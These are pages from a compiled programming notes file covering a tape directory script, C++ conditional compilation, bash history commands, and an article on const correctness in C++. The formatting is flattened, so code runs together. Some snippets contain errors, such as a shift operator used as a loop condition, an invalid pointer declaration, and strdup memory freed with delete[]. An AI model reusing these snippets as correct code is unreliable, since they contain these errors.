In order to make it a little easier to keep track of the data stored on a tar tape cartridge, there is a tape directory script defined in /usr/local/bin as tape_dir. This command will read as many tar archives as it can find on your tape, list the contents of those files, and report a summary of the approximate amount of data stored on the tape. This output can be redirected to a disk file for latter reference or printing. Simply load your tape in the drive and use tape_dir > mytape.dir to generate a disk file name mytape.dir with all the

Page 77: Appunti Informatica

directory information present. If you want to print a hard copy, simply do lp -dLaserJet4a_prn -o nobanner mytape.dir. Please note that this printer definition is the LaserJet on NMRSUN1. The printer on NMRSUN2 is LaserJet4_prn. The -o nobanner option suppresses printing of the extra header page.

Page 78: Appunti Informatica

Conditional Compilation (C++)

Conditional compilation directives allow you to delimit portions of code that are compiled only if a condition is true.

Syntax

conditional-directive ::=#if constant-expression newline#ifdef identifier newline [group]#ifndef identifier newline [group]#else newline [group]#elif constant-expression newline [group]#endif

NOTE: #elif is available only with the ANSI C preprocessor.

Here, constant-expression may also contain the defined operator:

defined identifierdefined (identifier)

Description

You can use #if, #ifdef, or #ifndef to mark the beginning of the block of code that will only be compiled conditionally. An #else directive optionally sets aside an alternative group of statements. You mark the end of the block using an #endif directive.

The following #if directive illustrates the structure of conditional compilation:

#if constant-expression . .

(Code that compiles if the expression evaluates to a nonzero value.)

. .#else . .

(Code that compiles if the expression evaluates to zero.)

. .#endif

The constant-expression is like other C++ integral constant expressions except that all arithmetic is carried out in long int precision. Also, the expressions cannot use the sizeof operator, a cast, an enumeration constant, or a const object.

Page 79: Appunti Informatica

Using the defined Operator

You can use the defined operator in the #if directive to use expressions that evaluate to 0 or 1 within a preprocessor line. This saves you from using nested preprocessing directives.

The parentheses around the identifier are optional. Below is an example:

#if defined (MAX) & ! defined (MIN) . . .

Without using the defined operator, you would have to include the following two directives to perform the above example:

#ifdef max#ifndef min

Using the #if Directive

The #if preprocessing directive has the form:

#if constant-expression

Use #if to test an expression. HP C++ evaluates the expression in the directive. If the expression evaluates to a nonzero value (TRUE), the code following the directive is included. Otherwise, the expression evaluates to FALSE and HP C++ ignores the code up to the next #else, #endif, or #elif directive.

All macro identifiers that appear in the constant-expression are replaced by their current replacement lists before the expression is evaluated. All defined expressions are replaced with either 1 or 0 depending on their operands.

The #endif Directive

Whichever directive you use to begin the condition (#if, #ifdef, or #ifndef), you must use #endif to end the if section.

Using the #ifdef and #ifndef Directives

The following preprocessing directives test for a definition:

#ifdef identifier#ifndef identifier

They behave like the #if directive, but #ifdef is considered true if the identifier was previously defined using a #define directive or the -D option. #ifndef is considered true if the identifier is not yet defined.

Nesting Conditional Compilation Directives

You can nest conditional compilation constructs. Delimit portions of the source program using conditional directives at the same level of nesting, or with a -D option on the command line.Using the #else Directive

Page 80: Appunti Informatica

Use the #else directive to specify an alternative section of code to be compiled if the #if, #ifdef, or #ifndef conditions fail. The code after the #else directive is included if the code following any of the #if directives is not included.

Using the #elif Directive

The #elif constant-expression directive, available only with the ANSI C preprocessor, tests whether a condition of the previous #if, #ifdef, or #ifndef was false. #elif has the same syntax as the #if directive and can be used in place of an #else directive to specify an alternative set of conditions.

Examples

The following examples show valid combinations of these conditional compilation directives:

#ifdef SWITCH // compiled if SWITCH is defined#else // compiled if SWITCH is undefined#endif // end of if

#if defined(THING) // compiled if THING is defined#endif // end of if

#if A>47 // compiled if A is greater than 47#else#if A < 20 // compiled if A is less than 20#else // compiled if A is greater than or equal // to 20 and less than or equal to 47#endif // end of if, A is less than 20#endif // end of if, A is greater than 47

The following are more examples showing conditional compilation directives:

#if (LARGE_MODEL)#define INT_SIZE 32 // Defined to be 32 bits.#elif defined (PC) & defined (SMALL_MODEL)#define INT_SIZE 16 // Otherwise, if PC and SMALL_MODEL // are defined, INT_SIZE is defined // to be 16 bits.#endif

#ifdef DEBUG // If DEBUG is defined, displaycout << "table element : \n"; // the table elements.for (i=0; i << MAX_TABLE_SIZE; ++i) cout << i << " " << table[i] << '\n';#endif

Page 81: Appunti Informatica

Using command history in the bash shell ( Linux )

(http://enterprise.linux.com/article.pl?sid=06/06/22/1517221&tid=13&tid=89&pagenum=1)

Monday July 03, 2006 (08:01 AM GMT)By: Mark Sobell

The Bourne Again Shell's history mechanism, a feature adapted from the C Shell, maintains a list of recently issued command lines, also called events, providing a quick way to reexecute any of the events in the list. This mechanism also enables you to execute variations of previous commands and to reuse arguments from them. You can replicate complicated commands and arguments that you used earlier in this login session or in a previous one and enter a series of commands that differ from one another in minor ways. The history list also serves as a record of what you have done. It can prove helpful when you have made a mistake and are not sure what you did, or when you want to keep a record of a procedure that involved a series of commands.

User Level: Intermediate This article is excerpted from chapter 9 of the new Third Edition of A Practical Guide to Red Hat Linux: Fedora Core and Red Hat Enterprise Linux , copyright 2007 Pearson Education, Inc. ISBN 0132280272. Published June 2006 by Prentice Hall Professional. Reproduced by permission of Pearson Education, Inc. All rights reserved. Variables that control history The value of the HISTSIZE variable determines the number of events preserved in the history list during a session. A value in the range of 100 to 1,000 is normal.When you exit from the shell, the most recently executed commands are saved in the file given by the HISTFILE variable (the default is ~/.bash_history). The next time you start the shell, this file initializes the history list. The value of the HISTFILESIZE variable determines the number of lines of history saved in HISTFILE (not necessarily the same as HISTSIZE). HISTSIZE holds the number of events remembered during a session, HISTFILESIZE holds the number remembered between sessions, and the file designated by HISTFILE holds the history list.

Variable Default Function

HISTSIZE 500 events Maximum number of events saved during a session

HISTFILE ~/.bash_history Location of the history file

HISTFILESIZE 500 events Maximum number of events saved between sessions

The Bourne Again Shell assigns a sequential event number to each command line. You can display this event number as part of the bash prompt by including \! in the PS1 variable. Examples in this article show numbered prompts when they help to illustrate the behavior of a command.Give the following command manually or place it in ~/.bash_profile (to affect future sessions) to establish a history list of the 100 most recent events: $ HISTSIZE=100

The following command causes bash to save the 100 most recent events across login sessions: $ HISTFILESIZE=100

After you set HISTFILESIZE, you can log out and log in again, and the 100 most recent events from the previous login session will appear in your history list.Give the command history to display the events in the history list. The list of events is ordered with oldest events at the top of the list. The following history list includes a command to modify the bash prompt so that

Page 82: Appunti Informatica

it displays the history event number. The last event in the history list is the history command that displayed the list.32 $ history | tail 23 PS1="\! bash$ " 24 ls -l 25 cat temp 26 rm temp 27 vim memo 28 lpr memo 29 vim memo 30 lpr memo 31 rm memo 32 history | tail

As you run commands and your history list becomes longer, it may run off the top of the screen when you use the history builtin. Pipe the output of history through less to browse through it, or give the command history 10 to look at the 10 most recent commands.You can reexecute any event in the history list. Not having to reenter long command lines allows you to reexecute events more easily, quickly, and accurately than you could if you had to retype the entire command line. You can recall, modify, and reexecute previously executed events in three ways: You can use the fc builtin (covered next); the exclamation point commands; or the Readline Library, which uses a one-line vi- or emacs-like editor to edit and execute events.If you are more familiar with vi or emacs and less familiar with the C or TC Shell, use fc or the Readline Library. If you are more familiar with the C or TC Shell and less familiar with vi and emacs, use the exclamation point commands. If it is a toss-up, try the Readline Library; it will benefit you in other areas of Linux more than learning the exclamation point commands will.

fc: Displays, Edits, and Reexecutes Commands

The fc (fix command) builtin enables you to display the history list and edit and reexecute previous commands. It provides many of the same capabilities as the command line editors.

When you call fc with the -l option, it displays commands from the history list. Without any arguments, fc -l lists the 16 most recent commands in a numbered list, with the oldest appearing first:

$ fc -l1024 cd1025 view calendar1026 vim letter.adams011027 aspell -c letter.adams011028 vim letter.adams011029 lpr letter.adams011030 cd ../memos1031 ls1032 rm *04051033 fc -l1034 cd1035 whereis aspell1036 man aspell1037 cd /usr/share/doc/*aspell*1038 pwd1039 ls1040 ls man-html

The fc builtin can take zero, one, or two arguments with the -l option. The arguments specify the part of the history list to be displayed: fc -l [ first [ last ]] The fc builtin lists commands beginning with the most recent event that matches first. The argument can be an event number, the first few characters of the command line, or a negative number, which is taken to be the n th previous command. If you provide last , fc displays commands from the most recent event that matches first

Page 83: Appunti Informatica

through the most recent event that matches last . The next command displays the history list from event 1030 through event 1035: $ fc -l 1030 10351030 cd ../memos1031 ls1032 rm *04051033 fc -l1034 cd1035 whereis aspell

The following command lists the most recent event that begins with view through the most recent command line that begins with whereis:$ fc -l view whereis1025 view calendar1026 vim letter.adams011027 aspell -c letter.adams011028 vim letter.adams011029 lpr letter.adams011030 cd ../memos1031 ls1032 rm *04051033 fc -l1034 cd1035 whereis aspell

To list a single command from the history list, use the same identifier for the first and second arguments. The following command lists event 1027:$ fc -l 1027 10271027 aspell -c letter.adams01

You can use fc to edit and reexecute previous commands.fc [-e editor ] [ first [ last ]]

When you call fc with the -e option followed by the name of an editor, fc calls the editor with event(s) in the Work buffer. Without first and last , fc defaults to the most recent command. The next example invokes the vi(m) editor to edit the most recent command: $ fc -e vi

The fc builtin uses the stand-alone vi(m) editor. If you set the FCEDIT variable, you do not need to use the -e option to specify an editor on the command line. Because the value of FCEDIT has been changed to /usr/bin/emacs and fc has no arguments, the following command edits the most recent command with the emacs editor:$ export FCEDIT=/usr/bin/emacs$ fc

If you call it with a single argument, fc invokes the editor on the specified command. The following example starts the editor with event 21 in the Work buffer. When you exit from the editor, the shell executes the command:$ fc 21

Again you can identify commands with numbers or by specifying the first few characters of the command name. The following example calls the editor to work on events from the most recent event that begins with the letters vim through event 206:$ fc vim 206

When you execute an fc command, the shell executes whatever you leave in the editor buffer, possibly with unwanted results. If you decide you do not want to execute a command, delete everything from the buffer before you exit from the editor.You can reexecute previous commands without going into an editor. If you call fc with the -s option, it skips the editing phase and reexecutes the command. The following example reexecutes event 1029: $ fc -s 1029lpr letter.adams01

The next example reexecutes the previous command:$ fc -s

When you reexecute a command you can tell fc to substitute one string for another. The next example substitutes the string john for the string adams in event 1029 and executes the modified event:$ fc -s adams=john 1029lpr letter.john01

Page 84: Appunti Informatica

Using an Exclamation Point (!) to Reference Events The C Shell history mechanism uses an exclamation point to reference events, and is available under bash. It is frequently more cumbersome to use than fc but nevertheless has some useful features. For example, the !! command reexecutes the previous event, and the !$ token represents the last word on the previous command line.You can reference an event by using its absolute event number, its relative event number, or the text it contains. All references to events, called event designators, begin with an exclamation point (!). One or more characters follow the exclamation point to specify an event.You can put history events anywhere on a command line. To escape an exclamation point so that it is treated literally instead of as the start of a history event, precede it with a backslash (\) or enclose it within single quotation marks. An event designator specifies a command in the history list.Event designators

Designator Meaning

! Starts a history event unless followed immediately by SPACE, NEWLINE, =, or (.

!! The previous command.

!n Command number n in the history list.

!-n The n th preceding command.

!string The most recent command line that started with string .

!?string[?] The most recent command that contained string . The last ? is optional.

!# The current command (as you have it typed so far).

!{event} The event is an event designator. The braces isolate event from the surrounding text. For example, !{-3}3 is the third most recently executed command followed by a 3.

You can always reexecute the previous event by giving a !! command. In the following example, event 45 reexecutes event 44:44 $ ls -l text-rw-rw-r-- 1 alex group 45 Apr 30 14:53 text45 $ !!ls -l text-rw-rw-r-- 1 alex group 45 Apr 30 14:53 text

The !! command works whether or not your prompt displays an event number. As this example shows, when you use the history mechanism to reexecute an event, the shell displays the command it is reexecuting.A number following an exclamation point refers to an event. If that event is in the history list, the shell executes it. Otherwise, the shell displays an error message. A negative number following an exclamation point references an event relative to the current event. For example, the command !-3 refers to the third preceding event. After you issue a command, the relative event number of a given event changes (event -3 becomes event -4). Both of the following commands reexecute event 44:51 $ !44ls -l text-rw-rw-r-- 1 alex group 45 Nov 30 14:53 text52 $ !-8ls -l text-rw-rw-r-- 1 alex group 45 Nov 30 14:53 text

Page 85: Appunti Informatica

When a string of text follows an exclamation point, the shell searches for and executes the most recent event that began with that string. If you enclose the string between question marks, the shell executes the most recent event that contained that string. The final question mark is optional if a RETURN would immediately follow it.68 $ history 10 59 ls -l text* 60 tail text5 61 cat text1 text5 > letter 62 vim letter 63 cat letter 64 cat memo 65 lpr memo 66 pine jenny 67 ls -l 68 history69 $ !lls -l...70 $ !lprlpr memo71 $ !?letter?cat letter...

Optional - Word Designators A word designator specifies a word or series of words from an event.Word designators

Designator Meaning

n The n th word. Word 0 is normally the command name.

^ The first word (after the command name).

$ The last word.

m - n All words from word number m through word number n ; m defaults to 0 if you omit it (0- n ).

n* All words from word number n through the last word.

* All words except the command name. The same as 1*.

% The word matched by the most recent ?string? search.

The words are numbered starting with 0 (the first word on the line -- usually the command), continuing with 1 (the first word following the command), and going through n (the last word on the line).To specify a particular word from a previous event, follow the event designator (such as !14) with a colon and the number of the word in the previous event. For example, !14:3 specifies the third word following the command from event 14. You can specify the first word following the command (word number 1) by using a caret (^) and the last word by using a dollar sign ($). You can specify a range of words by separating two word designators with a hyphen.72 $ echo apple grape orange pearapple grape orange pear73 $ echo !72:2echo grapegrape74 $ echo !72:^

Page 86: Appunti Informatica

echo appleapple75 $ !72:0 !72:$echo pearpear76 $ echo !72:2-4echo grape orange peargrape orange pear77 $ !72:0-$echo apple grape orange pearapple grape orange pear

As the next example shows, !$ refers to the last word of the previous event. You can use this shorthand to edit, for example, a file you just displayed with cat:$ cat report.718...

$ vim !$vim report.718...

If an event contains a single command, the word numbers correspond to the argument numbers. If an event contains more than one command, this correspondence does not hold true for commands after the first. In the following example, event 78 contains two commands separated by a semicolon so that the shell executes them sequentially; the semicolon is word number 5.78 $ !72 ; echo helen jenny barbaraecho apple grape orange pear ; echo helen jenny barbaraapple grape orange pearhelen jenny barbara79 $ echo !78:7echo helenhelen80 $ echo !78:4-7echo pear ; echo helenpearhelen

On occasion you may want to change an aspect of an event you are reexecuting. Perhaps you entered a complex command line with a typo or incorrect pathname, or you want to specify a different argument. You can modify an event or a word of an event by putting one or more modifiers after the word designator, or after the event designator if there is no word designator. Each modifier must be preceded by a colon (:).The substitute modifier is more complex than the other modifiers. The following example shows the substitute modifier correcting a typo in the previous event:$ car /home/jenny/memo.0507 /home/alex/letter.0507bash: car: command not found$ !!:s/car/catcat /home/jenny/memo.0507 /home/alex/letter.0507...

The substitute modifier has the following syntax:[g]s/ old _/ new _/

where old is the original string (not a regular expression), and new is the string that replaces old . The substitute modifier substitutes the first occurrence of old with new . Placing a g before the s (as in gs/old/new/) causes a global substitution, replacing all occurrences of old . The / is the delimiter in the examples, but you can use any character that is not in either old or new . The final delimiter is optional if a RETURN would immediately follow it. As with the vim Substitute command, the history mechanism replaces an ampersand (&) in new with old . The shell replaces a null old string (s//new/) with the previous old string or string within a command that you searched for with ?string?.An abbreviated form of the substitute modifier is quick substitution. Use it to reexecute the most recent event while changing some of the event text. The quick substitution character is the caret (^). For example, the command$ ^old^new^

produces the same results as$ !!:s/old/new/

Thus substituting cat for car in the previous event could have been entered as

Page 87: Appunti Informatica

$ ^car^catcat /home/jenny/memo.0507 /home/alex/letter.0507...

You can omit the final caret if it would be followed immediately by a RETURN. As with other command line substitutions, the shell displays the command line as it appears after the substitution.Modifiers (other than the substitute modifier) perform simple edits on the part of the event that has been selected by the event designator and the optional word designators. You can use multiple modifiers, each preceded by a colon (:).The following series of commands uses ls to list the name of a file, repeats the command without executing it (p modifier), and repeats the last command, removing the last part of the pathname (h modifier), again without executing it:$ ls /etc/sysconfig/harddisks/etc/sysconfig/harddisks$ !!:pls /etc/sysconfig/harddisks$ !!:h:pls /etc/sysconfig$

This table lists event modifiers other than the substitute modifier.Modifiers

Modifier Function

e (extension) Removes all but the filename extension

h (head) Removes the last part of a pathname

p (print-not) Displays the command, but does not execute it

q (quote) Quotes the substitution to prevent further substitutions on it

r (root) Removes the filename extension

t (tail) Removes all elements of a pathname except the last

x Like q but quotes each word in the substitution individually

Page 88: Appunti Informatica

Const Correctness in C++ ( C++ )

(http://www.research.att.com/~bs/books.html)

Introduction

A popular USENET joke goes:

In C, you merely shoot yourself in the foot.

In C++, you accidentally create a dozen instances of yourself and shoot them all in the foot. Providing emergency medical care is impossible, because you can't tell which are bitwise copies and which are just pointing at others and saying, "That's me, over there."

While it is true that using the object-oriented features of C++ requires more thought (and hence, more opportunities to make mistakes), the language provides features that can help you create more robust and bug-free applications. One of these features is const, the use of which I will address in this article. Used properly with classes, const augments data-hiding and encapsulation to provide full compile-time safety; violations of const cause compile-time errors, which can save you a lot of grief (from side-effects and other accidental modifications of data). Some C++ programmers believe const-correctness is a waste of time. I disagree - while it takes time to use const, the benefits almost always outweigh the time spent debugging. Furthermore, using const requires you to think about your code and its possible applications in more detail, which is a good thing. When you get used to writing const-correctly, it takes less time - this is a sign that you have achieved a state of enlightenment. Hopefully this article will help put you on the path of eternal bliss.

A Constant Variable?

If the concept of a constant variable seems paradoxical to you, keep in mind that in programming terms, "variable" means any named quantity, whether or not it varies.

The Many Faces of Const

Like most keywords in C++, the const modifier has many shades of meaning, depending on context. Used to modify variables, const (not surprisingly) makes it illegal to modify the variable after its initialization. For example:

int x = 4; // a normal variable that can be modifiedx = 10; // legal

const int x = 2; // const var can be initialized, not modified thereafterx = 10; // error - cannot modify const variable

Thus, const can replace the use of the #define to give names to manifest constants. Since preprocessor macros don't provide strong compile-time type checking, it is better to use const than #define. Moreover, some debugging environments will display the symbol which corresponds to a const value, but for #define constants, they will only display the value. The const keyword is more involved when used with pointers. A pointer is itself a variable which holds a memory address of another variable - it can be used as a "handle" to the variable whose address it holds. Note that there is a difference between "a read-only handle to a changeable variable" and a "changeable handle to a read-only variable".

const int x; // constant intx = 2; // illegal - can't modify x

Page 89: Appunti Informatica

const int* pX; // changeable pointer to constant int*pX = 3; // illegal - can't use pX to modify an intpX = &someOtherIntVar; // legal - pX can point somewhere else

int* const pY; // constant pointer to changeable int*pY = 4; // legal - can use pY to modify an intpY = &someOtherIntVar; // illegal - can't make pY point anywhere else

const int* const pZ; // const pointer to const int*pZ = 5; // illegal - can't use pZ to modify an intpZ = &someOtherIntVar; // illegal - can't make pZ point anywhere else

Const With Pointers and Type-Casting

A pointer to a const object can be initialized with a pointer to an object that is not const, but not vice versa.

int y;const int* pConstY = &y; // legal - but can't use pConstY to modify yint* pMutableY = &y; // legal - can use pMutableY to modify y*pMutableY = 42;

In the above code, all you're really saying is that you can't use pConstY as a handle to modify the data it points to. If y is not const, then you can safely modify y via another pointer, pMutableY for instance. Pointing at y with a const int* does not make y const, it just means that you can't change y using that pointer. If y is const, however, forcing the compiler to let you mess with its value can yield strange results. Although you should never write code that does this, you can play tricks on the compiler and try to modify const data. All you need to do is somehow put the address of the const int into a normal int* that you can use to modify the const int. C++ does not allow you to circumvent const easily because the assignment operator can't be used to put the contents of a const int* into a normal int* without explicit casts. C++ does not supply a standard conversion from a const type to a type that is not const. However, any sort of conversion can be specified with explicit type casts (including unsafe conversions). Thus, the type-system in C++ generally will not allow you to put the address of const data into a pointer to non-const data. For example, try to put the address of x, which is const, into a normal int* so you can use it to modify the data:

const int x; // x cannot be modified

const int* pX = &x; // pX is the address of a const int // and can't be used to change an int

*pX = 4; // illegal - can't use pX to change an int

int* pInt; // address of normal intpInt = pX; // illegal - cannot convert from const int* to int*

Nor will compiler let you take the address of a const variable and store it in a pointer to non-const data using the address-of operator (&), for the same reason:

int *pInt; // address of a normal intpInt = &x; // illegal - cannot convert from const int* to int*

The address-of operator returns a pointer to the variable; if the variable is a const int, it returns a const int*. If the variable is an int, & returns an int*. C++ makes it difficult to get a pointer to this data which can be used to modify it.

Page 90: Appunti Informatica

The const keyword can't keep you from purposely shooting yourself in the foot. Using explicit type-casting, you can freely blow off your entire leg, because while the compiler helps prevent accidental errors, it lets you make errors on purpose. Casting allows you to "pretend" that a variable is a different type. For example, C programmers learn early on that the result of dividing an integer by an integer is always an integer:

int x = 37;int y = 8;

double quotient = x / y; // classic mistake, result is rounded to an intcout << quotient; // prints " 4.000000" double quotient = (double)x/y; // cast result as double so it's not roundedcout << quotient; // prints "4.625000"

With casting, you can force the compiler to let you put the address of a const int variable into a normal int*. Remember that const int* and int* are, in fact, separate types. So you can cast from a const int* to a normal int* and use the pointer to try and modify data. The result, however, is undefined. The compiler is free to store constants wherever it wants (including non-writeable memory), and if you trick the compiler into letting you try to modify the constant, the result is undefined. This means that it might work, it might do nothing, or it might crash your program. The following code is a good illustration of how to mess yourself up with forced casting:

const int x = 4; // x is const, it can't be modifiedconst int* pX = &x; // you can't modify x through the pX pointer

cout << x << endl; // prints "4"

int* pX2 = (int *)pX; // explicitly cast pX as an int**pX2 = 3; // result is undefined

cout << x << endl; // who knows what it prints?

On my system using , this code compiles and runs without crashing, but the x does not appear to be changed by the second assignment; it outputs '4' both times. However, when you look at it more closely, strange things are happening. When you run the code, the output (from cout or printf) seems to show that x doesn't change in the second assignment. But when you step through the code, the debugger shows you that x does, in fact, change. So what is happening? If x changes, then why doesn't the output statement reflect this change? Often in such bizarre situations, it is a good idea to look at the assembler code that was produced. In Visual C++, compile with the /Fa"filename.asm" option to output the assembler with the corresponding lines of code into a file so you can look at it. Don't panic if you don't know much about assembler - if you know how arguments are pushed onto the stack, it's really quite easy to see what's happening.

ASSEMBLER OUTPUT C++ CODEMov eax, DWORD PTR _pX$[ebp] int* pX2 = (int *)pX;Mov DWORD PTR _pXX$[ebp], eaxMov eax, DWORD PTR _pXX$[ebp] *pX2 = 3;Mov DWORD PTR [eax], 3Push OFFSET FLAT:?endl@@......... cout << x << endl;Push 4

The important line is "Push 4". The assembler code shows that instead of pushing the value of x onto cout's stack frame, it pushes the literal constant 4 instead. The compiler assumes that since you declared x as const and initialized it as 4, it is free to optimize by pushing the literal constant 4 onto the stack rather than having to dereference x to get its value. This is a valid optmization, and happens in Visual C++ even with all optimization turned off. This code would work fine if we did not declare x as const. We could use a const int* to point at a non-const int, and have no trouble.

The Const_cast Operator

Page 91: Appunti Informatica

The above example is indicative of bad C++ casting manners. Another way to write functionally equivalent code is to use the const_cast operator to remove the const-ness from the const int*. The result is the same:

const int x = 4; // x is const, it can't be modifiedconst int* pX = &x; // you can't modify x through the pX pointer

cout << x << endl; // prints "4"

int* pX2 = const_cast < int* > (pX); // explicitly cast pX as non-const

*pX2 = 3; // result is undefinedcout << x << endl; // who knows what it prints?

Althought this is a naughty example, it's a good idea to use the const_cast operator. The const_cast operator is more specific than normal type-casts because it can only be used to remove the const-ness of a variable, and trying to change its type in other ways is a compile error. For instance, say that you changed x in the old-style cast version of the above example to an double and changed pX to double*. The code would still compile, but pX2 would be treating it as an int. It might not cause a problem (because ints and doubles are somewhat similar), but the code would certainly be confusing. Also, if you were using user-defined classes instead of numeric types, the code would still compile, but it would almost certainly crash your program. If you use const_cast, you can be sure that the compiler will only let you change the const-ness of a variable, and never its type.

Const Storage and String Literals

Another example of using pointers to play around with const storage is when you try to use a char* to modify a string literal. In C++, the compiler allows the use of string literals to initialize character arrays. A string literal consists of zero or more characters surrounded by double quotation marks ("). A string literal represents a sequence of characters that, taken together, form a null-terminated string. The compiler creates static storage space for the string, null-terminates it, and puts the address of this space into the char* variable. The type of a literal string is an array of const chars. The C++ standard (section lex.string) states:

1 A string literal is a sequence of characters (as defined in _lex.ccon_) surrounded by double quotes, optionally beginning with the letter L, as in "..." or L"...". A string literal that does not begin with L is an ordinary string literal, also referred to as a narrow string literal. An ordinary string literal has type "array of n const char" and static storage duration (_basic.stc_), where n is the size of the string as defined below, and is initialized with the given characters. A string literal that begins with L, such as L"asdf", is a wide string literal. A wide string literal has type "array of n const wchar_t" and has static storage duration, where n is the size of the string as defined below, and is initialized with the given charac- ters.

2 Whether all string literals are distinct (that is, are stored in nonoverlapping objects) is implementation-defined. The effect of attempting to modify a string literal is undefined.

In the following example, the compiler automatically puts a null-character at the end of the literal string of characters "Hello world". It then creates a storage space for the resulting string - this is an array of const chars. Then it puts the starting address of this array into the szMyString variable. We will try to modify this string (wherever it is stored) by accessing it via an index into szMyString. This is a Bad Thing; the standard

Page 92: Appunti Informatica

does not say where the compiler puts literal strings. They can go anywhere, possibly in some place in memory that you shouldn't be modifying.

char* szMyString = "Hello world."; szMyString[3] = 'q'; // undefined, modifying static buffer!!!

In James Coplien's book, Advanced C++ Programming Styles & Idioms, I came across the following code (p. 400):

char *const a = "example 1"; // a const pointer to (he claims) non-const dataa[8] = '2'; // Coplien says this is OK, but it's actually undefined

Both of these examples happen to work on my system, but you shouldn't rely on this kind of code to function correctly. Whether or not the literal strings you point to are explicitly declared const, you shouldn't try to modify them, because the standard states that they are in fact const. If you've been paying attention, you'll remember that the type-system in C++ will not allow you to put the address of const data into a pointer to non-const data without using explicit type casts, because there is no standard conversion between const types and types that are not const. Example:

const char constArray[] = { 'H', 'e', 'l', 'l', 'o', '\0' }; char nonConstArray[] = { 'H', 'e', 'l', 'l', 'o', '\0' }; char* pArray = constArray; // illegal char* pArray = nonConstArray; // legal

If, as the standard says, an ordinary string literal has type "array of n const char", then the following line of code should cause an error just like the above example:

// should be illegal - converts array of 6 const char to char* char* pArray = "Hello";

Of course, this code is a common idiom and it's perfectly legal. This appears to be an inconsistency in the language standard. A lot of these inconsistencies exist because older C and C++ code would break if the standard were strictly consistent. The standards people are afraid to break old code, because it would mean a decrease in the popularity of the language. Notice item 2 in the above quote from the language standard: literal strings don't have to be distinct. This means that it is legal for implementations to use string pooling, where all equal string literals are stored at the same place. For example, the help in Visual C++ states:

"The /GF option causes the compiler to pool strings and place them in read-only memory. By placing the strings in read-only memory, the operating system does not need to swap that portion of memory. Instead, it can read the strings back from the image file. Strings placed in read-only memory cannot be modified; if you try to modify them, you will see an Application Error dialog box. The /GF option is comparable to the /Gf option, except that /Gf does not place the strings in read-only memory. When using the /Gf option, your program must not write over pooled strings. Also, if you use identical strings to allocate string buffers, the /Gf option pools the strings. Thus, what was intended as multiple pointers to multiple buffers ends up as multiple pointers to a single buffer."

To test this, you can write a simple program as follows:

#include <stdio.h>

int main(){ char* szFirst = "Literal String"; char* szSecond = "Literal String";

szFirst[3] = 'q';

Page 93: Appunti Informatica

printf("szFirst (%s) is at %d, szSecond (%s) is at %d\n", szFirst, szFirst, szSecond, szSecond);

return 0;}

On my system, this program outputs: szFirst (Litqral String) is at 4266616, szSecond (Litqral String) is at 4266616

Sure enough. Although there was only one change, since string pooling was activated, both char* variables pointed to the same buffer. The output reflects this.

Const and Data-Hiding

It is often useful to use const variables when you have private data in a class, but you want to easily access the data outside of the class without changing it. For example:

class Person{ public: Person(char* szNewName) { // make a copy of the string m_szName = _strdup(szNewName); };

~Person() { delete[] m_szName; };

private: char* m_szName; };

Now, what if I wanted to easily print out the person's name? I could do the following:

class Person{ public: Person(char* szNewName) { // make a copy of the string m_szName = _strdup(szNewName); };

~Person() { delete[] m_szName; };

void PrintName() { cout << m_szName << endl; };

private: char* m_szName; };

Now I can call Person::PrintName() and it will print the name out to the console. There is a design problem with this code, however. It builds dependencies on the iostream libraries and the console I/O paradigm right into the Person class. Since a Person inherently has nothing to do with console I/O, one shouldn't tie the class to it. What if you want to print out the name in a Windows or X-Windows application? You'd need to change your class, and that reeks. So, we can do something like the following:

Page 94: Appunti Informatica

class Person{ public: Person(char* szNewName) { // make a copy of the string m_szName = _strdup(szNewName); };

~Person() { delete[] m_szName; };

void GetName(char *szBuf, const size_t nBufLen) { // ensure null termination in the copy strncpy(szBuf, m_szName, nBufLen - 1); }; private: char* m_szName; };

Now we can print the name out by doing something like this:

Person P("Fred Jones");char szTheName = new char[256];P.GetName(szTheName, 256);cout << szTheName << endl;

Wow, three lines of code just to print out a name. And I bet you didn't even notice that we forgot to delete the dynamic memory for szTheName! There must be a better way to do this. Why don't we just return a pointer to the string?

class Person{ public: Person(char* szNewName) { // make a copy of the string m_szName = _strdup(szNewName); };

~Person() { delete[] m_szName; };

char* GetName() { return m_szName; };

private: char* m_szName; };

With this, you can print out the code in one line:

Person P("Fred Jones");cout << P.GetName() << endl;

Much shorter, but as you may have noticed, the m_szName variable is private inside the Person class! What's the point of declaring it as private if you're going to pass out non-const pointers to it? What if you wrote a buggy print function that modified what it was printing?

// this function overwrites szString // (which may have held the address of dynamically allocated memory)

Page 95: Appunti Informatica

void MyBuggyPrint(char* szString){ // make a copy of the string and print out the copy szString = _strdup(szString);

cout << szString << endl; free (szString);}

Person P("Fred Jones");MyBuggyPrint(P.GetName());

The MyBuggyPrint function makes a new string, puts the new string's address in its first parameter, prints it, then deletes it. This results in two related problems. We pass in a pointer to the string data that was allocated in the Person constructor, the pointer gets set to the location of the string copy, which then gets deleted. So P.m_szName is left pointing to garbage. Second, since you lose the original location of the string pointed to by m_szName, you never free the string, so it's a memory leak. Fortunately, the const keyword comes in handy in situations like this. At this point, I'm sure some readers will object that if you write your code correctly, you won't need to protect yourself from your own mistakes - "You can either buy leaky pens and wear a pocket protector, or just buy pens that don't leak, period." While I agree with this philosophy, it is important to remember that when you're writing code, you're not buying pens - you're manufacturing pens for other people to stick in their pockets. Using const helps in manufacturing quality pens that don't leak.

class Person{ public: Person(char* szNewName) { // make a copy of the string m_szName = _strdup(szNewName); };

~Person() { delete[] m_szName; };

const char* const GetName() { return m_szName; };

private: char* m_szName; };

Person P("Fred Jones");

MyBuggyPrint(P.GetName()); // error! Can't convert const char* const to char*

This time, we're returning a const char* const from the class, which means that you can't change the pointer to point somewhere else, and you can't modify what the pointer points to. Now your code won't even compile, because your MyBuggyPrint function expects a char*. This brings up an interesting point. If you wrote your code this way, you'd have to go back and rewrite your MyBuggyPrint function to take a const char* const (hopefully fixing it in the process). This is a pretty inefficient way to code, so remember that you should use const as you go - don't try to make everything const correct after the fact. As you're writing a function like MyBuggyPrint, you should think "Hmmm...do I need to modify what the pointer points to? No...do I need to point the pointer somewhere else? No...so I will use a const char* const argument." Once you start thinking like this, it's easy to do, and it will keep you honest; once you start using const correctness, you have to use it everywhere.

Page 96: Appunti Informatica

With this philosophy, we could further modify the above example by having the Person constructor take a const char* const, instead of a char*. We could also further modify the GetName member function. We can declare it as:

class Person{ public: Person(char* szNewName) { // make a copy of the string m_szName = _strdup(szNewName); };

~Person() { delete[] m_szName; };

const char* const GetName() const { return m_szName; };

private: char* m_szName; };

